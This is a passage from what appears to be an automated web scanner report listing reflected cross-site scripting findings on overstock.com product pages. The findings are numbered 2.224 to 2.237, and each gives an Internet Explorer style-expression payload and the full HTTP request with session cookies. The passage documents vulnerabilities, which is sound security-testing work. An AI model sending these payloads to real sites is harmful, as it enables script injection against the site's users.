GET /Home-Garden/Five-tier-Antique-Black-Ladder-Shelf/2041992/product.html?4024f"style%3d"x%3aexpression(alert(1))"bf6a2d0c452=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.224. http://www.overstock.com/Home-Garden/Flowers-Hand-painted-Oil-on-Canvas-Art-Set/4117199/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5f87"style%3d"x%3aexpression(alert(1))"dbc36f8dfd7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b5f87"style="x:expression(alert(1))"dbc36f8dfd7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Flowers-Hand-painted-Oil-on-Canvas-Art-Set/4117199/product.html?b5f87"style%3d"x%3aexpression(alert(1))"dbc36f8dfd7=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.225. http://www.overstock.com/Home-Garden/Flowers-Hand-painted-Oil-on-Canvas-Art-Set/4117200/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84a31"style%3d"x%3aexpression(alert(1))"0703874557e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 84a31"style="x:expression(alert(1))"0703874557e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Flowers-Hand-painted-Oil-on-Canvas-Art-Set/4117200/product.html?84a31"style%3d"x%3aexpression(alert(1))"0703874557e=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.226. http://www.overstock.com/Home-Garden/Flying-Hand-painted-Abstract-Art-Set/4573315/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50b09"style%3d"x%3aexpression(alert(1))"0440381f9f0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 50b09"style="x:expression(alert(1))"0440381f9f0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Flying-Hand-painted-Abstract-Art-Set/4573315/product.html?50b09"style%3d"x%3aexpression(alert(1))"0440381f9f0=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.227. http://www.overstock.com/Home-Garden/Foam-Padded-Zero-Gravity-Outdoor-Folding-Recliner/4009521/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cca92"style%3d"x%3aexpression(alert(1))"d5824feaf20 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cca92"style="x:expression(alert(1))"d5824feaf20 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Foam-Padded-Zero-Gravity-Outdoor-Folding-Recliner/4009521/product.html?cca92"style%3d"x%3aexpression(alert(1))"d5824feaf20=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.228. http://www.overstock.com/Home-Garden/Foam-and-Spring-10-inch-Queen-size-Mattress/5085885/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff9bf"style%3d"x%3aexpression(alert(1))"0f56b070001 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ff9bf"style="x:expression(alert(1))"0f56b070001 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Foam-and-Spring-10-inch-Queen-size-Mattress/5085885/product.html?ff9bf"style%3d"x%3aexpression(alert(1))"0f56b070001=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.229. http://www.overstock.com/Home-Garden/Fontain-Blue-7-piece-Comforter-Set/4359353/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b168e"style%3d"x%3aexpression(alert(1))"fd551895a33 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b168e"style="x:expression(alert(1))"fd551895a33 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Fontain-Blue-7-piece-Comforter-Set/4359353/product.html?b168e"style%3d"x%3aexpression(alert(1))"fd551895a33=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.230. http://www.overstock.com/Home-Garden/Four-Seasons-Italian-Washable-Wool-Blanket/3671914/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3c96"style%3d"x%3aexpression(alert(1))"b095f00d342 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b3c96"style="x:expression(alert(1))"b095f00d342 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Four-Seasons-Italian-Washable-Wool-Blanket/3671914/product.html?b3c96"style%3d"x%3aexpression(alert(1))"b095f00d342=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.231. http://www.overstock.com/Home-Garden/Four-Step-Foldable-Kitchen-Ladder/2894229/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9560"style%3d"x%3aexpression(alert(1))"b4e69bf0acd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d9560"style="x:expression(alert(1))"b4e69bf0acd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Four-Step-Foldable-Kitchen-Ladder/2894229/product.html?d9560"style%3d"x%3aexpression(alert(1))"b4e69bf0acd=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.232. http://www.overstock.com/Home-Garden/Fredericksburg-Espresso-Storage-Cabinet/3314073/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60b1f"style%3d"x%3aexpression(alert(1))"00d3ef358a3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 60b1f"style="x:expression(alert(1))"00d3ef358a3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Fredericksburg-Espresso-Storage-Cabinet/3314073/product.html?60b1f"style%3d"x%3aexpression(alert(1))"00d3ef358a3=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.233. http://www.overstock.com/Home-Garden/French-Tile-3-piece-Quilt-Set/3846455/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2fd4b"style%3d"x%3aexpression(alert(1))"4bd524a7403 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2fd4b"style="x:expression(alert(1))"4bd524a7403 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/French-Tile-3-piece-Quilt-Set/3846455/product.html?2fd4b"style%3d"x%3aexpression(alert(1))"4bd524a7403=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.234. http://www.overstock.com/Home-Garden/Fresh-Ideas-14-inch-Drop-Poplin-Bedskirt/3418195/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb5a4"style%3d"x%3aexpression(alert(1))"19be11aec70 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fb5a4"style="x:expression(alert(1))"19be11aec70 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Fresh-Ideas-14-inch-Drop-Poplin-Bedskirt/3418195/product.html?fb5a4"style%3d"x%3aexpression(alert(1))"19be11aec70=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.235. http://www.overstock.com/Home-Garden/FufSack-Black-Sofa-Sleeper-Lounge-Chair/4219652/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 325b0"style%3d"x%3aexpression(alert(1))"87432a62f29 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 325b0"style="x:expression(alert(1))"87432a62f29 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/FufSack-Black-Sofa-Sleeper-Lounge-Chair/4219652/product.html?325b0"style%3d"x%3aexpression(alert(1))"87432a62f29=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.236. http://www.overstock.com/Home-Garden/FufSack-Chocolate-Brown-Sofa-Sleeper-Lounge-Chair/4219640/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 249ee"style%3d"x%3aexpression(alert(1))"6725bf93379 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 249ee"style="x:expression(alert(1))"6725bf93379 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/FufSack-Chocolate-Brown-Sofa-Sleeper-Lounge-Chair/4219640/product.html?249ee"style%3d"x%3aexpression(alert(1))"6725bf93379=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.237. http://www.overstock.com/Home-Garden/Glow-Modern-Frameless-Wall-Mirror/4311800/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9667"style%3d"x%3aexpression(alert(1))"edd683c3161 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a9667"style="x:expression(alert(1))"edd683c3161 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
